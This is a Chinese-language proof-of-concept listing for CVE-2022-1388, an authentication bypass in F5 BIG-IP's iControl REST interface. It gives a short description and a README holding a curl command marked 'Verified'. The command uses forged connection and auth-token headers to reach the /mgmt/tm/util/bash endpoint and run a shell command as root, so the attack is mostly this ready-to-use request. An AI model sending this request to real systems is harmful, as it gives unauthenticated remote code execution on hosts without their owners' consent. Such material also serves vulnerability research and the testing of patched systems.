关联漏洞
标题:
F5 BIG-IP 访问控制错误漏洞
(CVE-2022-1388)
描述:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过BIG-IP中的iControl REST身份验证来控制受影响的系统。
描述
K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388
介绍
# CVE-2022-1388
BIG-IP iControl REST vulnerability CVE-2022-1388
# Usage
* This POC is Verified!


```
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'Authorization: Basic YWRtaW46' -H $'X-F5-Auth-Token: a' -H $'Content-Length: 39' \
--data-binary $'{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}' \
$'https://IP_HERE/mgmt/tm/util/bash'
```
# Reference
https://twitter.com/1ZRR4H/status/1522150111429726209
https://twitter.com/AnnaViolet20/status/1523564632140509184
文件快照
[4.0K] /data/pocs/7ae4d9b762eaa376d73079ebd2fb81a333a02f99
├── [ 716] bigip-icontrol-rest-rce.yaml
├── [ 449] f5-icontrol-rest-api-auth-bypass.yaml
├── [ 92K] pic.jpeg
├── [113K] rce.jpeg
└── [ 702] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。